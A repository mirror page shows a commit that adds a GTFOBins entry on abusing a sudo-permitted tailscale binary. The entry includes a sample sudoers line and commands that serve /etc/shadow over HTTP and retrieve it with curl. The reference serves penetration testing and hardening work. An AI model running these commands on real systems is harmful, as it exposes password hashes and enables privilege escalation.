mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2025-12-27 18:51:41 +01:00
Code Issues

Merge bfd71131697737345792367bb955e3129cbf6569 into b29f2cfde1c72e4ea5191e49604e923bbda98461

Browse Source
This commit is contained in:
Nebtyy 2025-10-11 10:13:10 +00:00 committed by GitHub
commit 6c7c20a077
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 26 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
_gtfobins/tailscale.md Normal file
View File

@ -0,0 +1,26 @@
---
description: |
If the `tailscale` binary is allowed via `sudo`, it can be abused to read arbitrary root-readable files
using the `serve` subcommand. This launches an HTTP server (accessible within the same Tailnet)
that exposes the specified file without further access control.
functions:
sudo:
- description: |
If the user can run `/usr/bin/tailscale` as root via `sudo`, they can serve and read any file
accessible by root. The file becomes reachable via a Tailscale-assigned domain over HTTP.
Example `sudoers` entry:
```
ray ALL=(ALL) NOPASSWD: /usr/bin/tailscale
```
Example exploitation:
```
sudo tailscale serve --http=8888 /etc/shadow
curl http://<hostname>.<tailnet>.ts.net:8888/
```
code: |
sudo tailscale serve --http=8888 /etc/shadow
curl http://<hostname>.<tailnet>.ts.net:8888/
---